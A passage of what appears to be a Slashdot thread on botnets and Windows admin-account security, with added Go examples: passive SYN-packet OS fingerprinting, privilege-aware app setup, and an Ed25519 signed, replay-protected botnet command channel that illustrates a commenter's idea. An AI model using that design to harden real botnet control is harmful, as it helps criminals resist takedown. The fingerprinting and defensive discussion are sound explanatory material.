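// ParseSyn extracts those features from a raw IPv4 packet carrying a TCP SYN.
func ParseSyn(pkt []byte) (SynFeatures, error) {
	var f SynFeatures
	if len(pkt) < 40 || pkt[0]>>4 != 4 || pkt[9] != 6 {
		return f, errors.New("not an IPv4/TCP packet")
	}
	ihl := int(pkt[0]&0x0f) * 4
	if ihl < 20 || len(pkt) < ihl+20 {
		return f, errors.New("bad IP header length")
	}
	tcp := pkt[ihl:]
	doff := int(tcp[12]>>4) * 4
	if doff < 20 || len(tcp) < doff || tcp[13]&0x12 != 0x02 { // SYN set, ACK clear
		return f, errors.New("not a well-formed SYN")
	}
	f.TTL = pkt[8]
	f.Window = binary.BigEndian.Uint16(tcp[14:16])
	f.Options = optionKinds(tcp[20:doff])
	return f, nil
}

// optionKinds walks the TCP option list and records the kind of each option,
// stopping on a malformed length instead of looping forever.
func optionKinds(opts []byte) string {
	var kinds []string
	for i := 0; i < len(opts) && opts[i] != 0; { // kind 0 ends the list
		kind := opts[i]
		name, ok := optionNames[kind]
		if !ok {
			name = fmt.Sprintf("?%d", kind)
		}
		kinds = append(kinds, name)
		if kind == 1 { // NOP carries no length byte
			i++
		} else if i+1 < len(opts) && opts[i+1] >= 2 {
			i += int(opts[i+1])
		} else {
			break
		}
	}
	return strings.Join(kinds, ",")
}

// Genre guesses the sender's OS family. Windows starts TTL at 128 and sends
// MSS,NOP,WS,NOP,NOP,SACK; Linux starts at 64 and sends MSS,SACK,TS,NOP,WS.
// Each router hop decrements TTL, so anything up to the initial value matches.
func Genre(f SynFeatures) string {
	switch {
	case f.TTL > 64 && f.TTL <= 128 && f.Options == "M,N,W,N,N,S":
		return "Windows"
	case f.TTL <= 64 && f.Options == "M,S,T,N,W":
		return "Linux"
	}
	return "unknown"
}

// BuildSyn assembles a minimal IPv4+TCP SYN; it exists only to make samples.
func BuildSyn(ttl uint8, window uint16, opts []byte) []byte {
	tcpLen := 20 + len(opts) // opts must already be padded to a multiple of 4
	ip := make([]byte, 20)
	ip[0] = 0x45 // IPv4, 20-byte header
	binary.BigEndian.PutUint16(ip[2:4], uint16(20+tcpLen))
	ip[8], ip[9] = ttl, 6 // TTL, protocol TCP
	tcp := make([]byte, tcpLen)
	tcp[12] = byte(tcpLen/4) << 4 // data offset
	tcp[13] = 0x02                // SYN
	binary.BigEndian.PutUint16(tcp[14:16], window)
	copy(tcp[20:], opts)
	return append(ip, tcp...)
}

// Constructed samples, not captures: a Windows XP-style SYN eight hops away
// and a Linux 2.6-style SYN seven hops away.
var WindowsSample = BuildSyn(120, 65535, []byte{2, 4, 5, 0xb4, 1, 3, 3, 0, 1, 1, 4, 2})
var LinuxSample = BuildSyn(57, 5840, []byte{2, 4, 5, 0xb4, 4, 2, 8, 10, 0, 0, 0, 1, 0, 0, 0, 0, 1, 3, 3, 7})

func main() {
	for _, pkt := range [][]byte{WindowsSample, LinuxSample} {
		f, err := ParseSyn(pkt)
		fmt.Printf("ttl=%d win=%d opts=%q -> %s (err=%v)\n", f.TTL, f.Window, f.Options, Genre(f), err)
	}
}
```

On a Linux edge this is what p0f and the firewall `osf` match do against a signature database. Two caveats before anyone wires the result into a drop rule: a rule that drops the Windows genre also drops every Windows host you actually want to serve, and a sender that sets its own TTL and option order, or sits behind a proxy or VPN that rewrites them, is misclassified, so the genre is a logging hint rather than a blocking decision.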
    • Re:Ha! by pe1chl (Score:3) Sunday August 26, @12:23PM
      • Re:Ha! (Score:4, Funny)

        by MrMr (219533) on Sunday August 26, @12:39PM (#20363387)
        Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

        You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

        That is hilarious.
        • Re:Ha! (Score:5, Insightful)

          by cp.tar (871488) <cp.tar.bz2@gmail.com> on Sunday August 26, @01:04PM (#20363553)

          Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

          You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

          That is hilarious.

          Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.

          I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.

          Everybody just used the admin account again. Not even the fact that each could have their own desktop enticed them to use their own accounts; instead, they had one desktop full of five people's crud.

          • Re:Ha! by trawg (Score:2) Monday August 27, @03:42AM
            • Re:Ha! by BlackSnake112 (Score:1) Monday August 27, @02:38PM
      • Re:Ha! (Score:5, Insightful)

        Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

        As long as the situation remains like this, there is little Microsoft can do.
        No, they could arrange for the majority of their own user-targeted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges. They could clamp down on giving "Windows Certification" to things like printer drivers that require Admin privs to work (after installation). They could get similarly strict with applications. All those sorts of things. Make life actually workable for people who are running without high privs. And without doing that, they'll never manage to inculcate a culture of security, and there's an awful long way to go there, alas...

        (BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)
        • Re:Ha! by PalmerEldritch42 (Score:2) Sunday August 26, @01:52PM
          • I think what he meant was you can install but not use the app while logged in as an Administrator account, encouraging people to log in as users.
          • Re:Ha! (Score:5, Insightful)

            by arivanov (12034) on Sunday August 26, @04:01PM (#20365089)
            (http://www.sigsegv.cx/)
            This is not crippling admin accounts, it is making apps behave in an administrative manner when run by an admin.

            Staroffice 3.x was a brilliant example. When you ran its setup as root it automatically went into global per-machine setup mode, while running it as Joe Average User made it run a workstation setup. In fact Office 6.x for Windows 95/NT behaved in a similar manner as well. If you ran it from a network install it behaved differently when run as admin vs when run as an average user.

            I have no idea why developers stopped doing that. IMO, that was the right behaviour.
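The behaviour the two posts above argue for, an application that notices it is running with administrative privileges, switches to a machine-wide install, and refuses to open its interactive part, as an added Go example for Linux (my code, not from the thread, from StarOffice or from any shipping product). `exampleapp`, its paths and the EXAMPLEAPP_ALLOW_ROOT_GUI override are hypothetical names; the uid/euid/SUDO_USER checks are the real signals a process has on Linux.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
)

// Mode is how the hypothetical "exampleapp" behaves given who is running it.
type Mode int

const (
	PerUser    Mode = iota // ordinary account: everything lives under $HOME
	PerMachine             // a real root session: install system-wide, no GUI
	Refuse                 // privilege state we do not understand: do nothing
)

func (m Mode) String() string {
	return [...]string{"per-user", "per-machine", "refuse"}[m]
}

var ErrRefuse = errors.New("refusing to run in this privilege state")

// ChooseMode decides from the process credentials (os.Getuid/os.Geteuid).
func ChooseMode(uid, euid int) Mode {
	if uid != euid {
		return Refuse // set-uid binary or half-dropped privileges
	}
	if euid == 0 {
		return PerMachine // root login or sudo; either way behave as the admin
	}
	return PerUser
}

// ConfigDir is where the app writes. Under sudo, $HOME usually still names the
// invoking user's directory; writing there as root leaves root-owned files that
// break that user's later per-user runs, so PerMachine ignores home entirely.
func ConfigDir(mode Mode, home string) (string, error) {
	switch mode {
	case PerMachine:
		return "/etc/exampleapp", nil
	case PerUser:
		if home == "" {
			return "", errors.New("HOME is unset")
		}
		return filepath.Join(home, ".config", "exampleapp"), nil
	}
	return "", ErrRefuse
}

// AllowInteractive is the Office-style rule from the thread: the front-end
// that opens user documents read-write does not start as root unless the
// admin explicitly overrides, e.g. for a one-off repair job.
func AllowInteractive(mode Mode, override bool) bool {
	switch mode {
	case PerUser:
		return true
	case PerMachine:
		return override
	}
	return false
}

func main() {
	mode := ChooseMode(os.Getuid(), os.Geteuid())
	dir, err := ConfigDir(mode, os.Getenv("HOME"))
	gui := AllowInteractive(mode, os.Getenv("EXAMPLEAPP_ALLOW_ROOT_GUI") == "1")
	fmt.Printf("mode=%s configdir=%q err=%v interactive=%v sudo_user=%q\n",
		mode, dir, err, gui, os.Getenv("SUDO_USER"))
}
```

Run it once as yourself and once under `sudo` to see the switch: the second run reports per-machine, points at /etc, and keeps the interactive part closed even though $HOME and SUDO_USER still name the ordinary user.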
        • Re:Ha! by kon23uk (Score:1) Monday August 27, @01:47PM
      • Re:Ha! by vtcodger (Score:2) Sunday September 09, @12:22PM
    • Re:Ha! ISPs? by ispsuckz (Score:1) Sunday August 26, @12:48PM
    • Re:Ha! by cp.tar (Score:2) Sunday August 26, @01:09PM
      • B.S. (Score:5, Insightful)

        by encoderer (1060616) on Monday August 27, @07:48AM (#20370377)
        "Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do"

        Ok, I call Bullshit.

        1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average /.'er for the UAC prompts. However, the user is only shown a prompt when an application is doing things that people in this thread are saying applications should not be allowed to do. No, UAC is not an elegant solution. But the problem is that an entire ecosystem of software exists that was not written with an eye on security. These apps are doing things that apps should not be doing, often just to make things easier on the programmer. Microsoft needs to throw a UAC when this happens. In time, more and more apps will play by the rules and not throw prompts.

        This is a tangent, but still to the point: MSFT is damned if they do, damned if they don't.

        2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.

        3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.

        Your approach is a LOT like saying "Terrorism won't be a problem once everyone switches to Christianity."
        • Re:B.S. by cp.tar (Score:2) Monday August 27, @05:45PM
          • Re:B.S. by encoderer (Score:3) Tuesday August 28, @02:20PM
        • BS right back at ya by theolein (Score:2) Sunday September 09, @12:15PM
    • Re:Ha! (Score:4, Funny)

      by ewhenn (647989) on Sunday August 26, @01:24PM (#20363741)

      Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.


      That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.

      I bet if I sent out some random crap exe to a bunch of people, which, when opened, would pop up a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" OK or Cancel. And some people STILL would click OK.
      • Re:Ha! by rolfc (Score:1) Monday August 27, @04:55AM
        • Re:Ha! by bane2571 (Score:1) Sunday September 09, @08:51PM
    • Re:Ha! by jcr (Score:2) Sunday August 26, @02:24PM
    • Re:Ha! (Score:5, Insightful)

      by jcr (53032) <jcr.idiom@com> on Sunday August 26, @02:38PM (#20364377)
      (Last Journal: Sunday November 05 2006, @05:31AM)
      I can show you a custom-hardened build of Windows Server 2003

      Umm... So what? You go to great lengths to lock down a windows machine, and good for you. It doesn't help the millions of people affected by the bugs present in a pristine install of any MS product.

      -jcr

    • There are many solutions... by Joce640k (Score:2) Sunday August 26, @03:56PM
  • Re:Ha! (Score:2, Insightful)

    by nsanders (208050) on Sunday August 26, @12:09PM (#20363117)
    (http://www.slashdot.org/)
    If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies. We are not immune, we are simply not as big of a target because of Windows market share. I don't think the magnitude of the problems would be the same, but to say it will (or could) never happen to *nix or OS X is naive.
    • Re:Ha! by ddrichardson (Score:1) Sunday August 26, @07:39PM
      • Re:Ha! by BlackSnake112 (Score:2) Monday August 27, @02:55PM
  • Re:Thank you Microsoft (Score:2, Funny)

    by Anonymous Coward on Sunday August 26, @12:17PM (#20363185)

    Hope your happy Billyboy Gates!
    Hope my happy Billyboy Gates what?!
  • Re:250k to 10M bots? (Score:2, Insightful)

    by micksam7 (1026240) * on Sunday August 26, @12:34PM (#20363333)
    (http://micksam7.com/)
    250k is still a lot. Enough to spew 64 gigabits per second of data, assuming each infested machine had a 256k uplink [and ignoring other factors]. That's enough to take out a decent sized datacenter.

    On the other end, 10 million could possibly take out an entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.
  • Re:Ha! (Score:4, Informative)

    by uncleFester (29998) on Sunday August 26, @12:43PM (#20363419)
    (http://www.fatass.com/ | Last Journal: Thursday December 05 2002, @12:09PM)
    Never will happen to os x or other *nix systems.

    ... and just where the hell do you think the term 'rootkit' came from?

    this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.

    i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... ? and i guess i just imagine those security advisories IBM puts out for AIX...

    if you do no work to ensure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

    -r
    • Re:Ha! by Anonymous Coward (Score:1) Sunday August 26, @12:56PM
    • Re:Ha! by The_mad_linguist (Score:1) Sunday August 26, @01:12PM
      • Re:Ha! by hedwards (Score:2) Sunday August 26, @03:32PM
    • Re:Ha! by Anonymous Coward (Score:1) Sunday August 26, @05:43PM
  • Re:Thank you Microsoft (Score:5, Funny)

    by ScentCone (795499) on Sunday August 26, @01:23PM (#20363725)
    Hope your happy Billyboy Gates!

    I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."
  • Re:Ha! (Score:1)

    by Willfon (525161) on Sunday August 26, @03:38PM (#20364909)
    (http://slashdot.org/)
    Actually, there are gaping holes in MacOS X as well. If I send out an email with a file attached (e.g. .dmg), I can make the recipient install distributed.net, believing he is just getting a business card. Provided of course the user is an administrator and that he opens the business-card-like installer. Not that long ago Apple patched a hole where code was run when you opened a creatively made .dmg file. New holes keep cropping up, but in the end, the biggest hole is the trusting user who uses the default login user, which is an administrator.

    And that hole is the same, no matter if you run Windows, MacOS X, Linux or MyLittlePonyOS
  • by sveard (1076275) on Sunday August 26, @04:07PM (#20365155)

    Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be earning billions a year fighting this crap. Hope your happy Billyboy Gates!
    There, fixed that for ya
  • What would you say makes a botnet inherently insecure? The bot can patch the exploits it used to get in and can be made to only take and relay commands if they are cryptographically signed by the botnet's owner. That way taking over one machine from the botnet doesn't really get you any further towards compromising the net as a whole.
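The signed-command scheme that comment sketches, as an added Go example written for this page (not code from any real bot, and not a claim about how Storm works): the operator signs `sequence || payload` with an Ed25519 private key, and a node accepts only commands that verify under the public key it carries and whose sequence number is newer than the last one it accepted. The seeds and payload strings are constructed for the example; a real operator would draw the seed from crypto/rand.

```go
package main

import (
	"crypto/ed25519"
	"encoding/binary"
	"errors"
	"fmt"
)

// Operator is the owner's side: the only place the private key ever exists.
type Operator struct{ priv ed25519.PrivateKey }

// Node is everything a researcher recovers from a captured bot: the public key
// and the last sequence number it accepted. Neither lets anyone mint commands.
type Node struct {
	pub     ed25519.PublicKey
	lastSeq uint64
}

var (
	ErrBadSig = errors.New("command rejected: signature does not verify")
	ErrReplay = errors.New("command rejected: sequence number not newer")
)

// NewOperator derives a key pair from a 32-byte seed (fixed here so the run is
// deterministic; this is a constructed seed, not a real one).
func NewOperator(seed []byte) Operator {
	return Operator{priv: ed25519.NewKeyFromSeed(seed)}
}

func (o Operator) Public() ed25519.PublicKey {
	return o.priv.Public().(ed25519.PublicKey)
}

// Issue encodes seq || payload and signs the whole thing, so neither the
// counter nor the payload can be altered in transit.
func (o Operator) Issue(seq uint64, payload []byte) (msg, sig []byte) {
	msg = make([]byte, 8+len(payload))
	binary.BigEndian.PutUint64(msg, seq)
	copy(msg[8:], payload)
	return msg, ed25519.Sign(o.priv, msg)
}

func NewNode(pub ed25519.PublicKey) *Node { return &Node{pub: pub} }

// Accept verifies the signature before anything else, then enforces a strictly
// increasing sequence number so a captured genuine command cannot be replayed.
func (n *Node) Accept(msg, sig []byte) ([]byte, error) {
	if len(msg) < 8 || !ed25519.Verify(n.pub, msg, sig) {
		return nil, ErrBadSig
	}
	seq := binary.BigEndian.Uint64(msg[:8])
	if seq <= n.lastSeq {
		return nil, ErrReplay
	}
	n.lastSeq = seq
	return msg[8:], nil
}

func main() {
	owner := NewOperator([]byte("constructed-seed-for-the-example")) // 32 bytes
	bot := NewNode(owner.Public())

	msg, sig := owner.Issue(1, []byte("spam template 7"))
	_, err := bot.Accept(msg, sig)
	fmt.Println("genuine command:", err)
	_, err = bot.Accept(msg, sig)
	fmt.Println("same command again:", err)

	tampered := append([]byte{}, msg...)
	tampered[len(tampered)-1] ^= 1
	_, err = bot.Accept(tampered, sig)
	fmt.Println("tampered payload:", err)

	// Someone holding only what the bot holds cannot produce a usable signature.
	hijacker := NewOperator([]byte("someone-without-the-private-key!"))
	msg2, sig2 := hijacker.Issue(2, []byte("report to sinkhole"))
	_, err = bot.Accept(msg2, sig2)
	fmt.Println("wrong key:", err)
}
```

Verification runs before the sequence check, so an unsigned message can never advance the counter and lock out real commands. A captured node yields the public key, which lets a defender verify and decode traffic but not inject it; had the design used a shared HMAC key instead, pulling that key from a single bot would have been enough to command the whole net. That asymmetry is why taking down a net built this way means going after the key-holding infrastructure or the rendezvous channel rather than cleaning up individual bots.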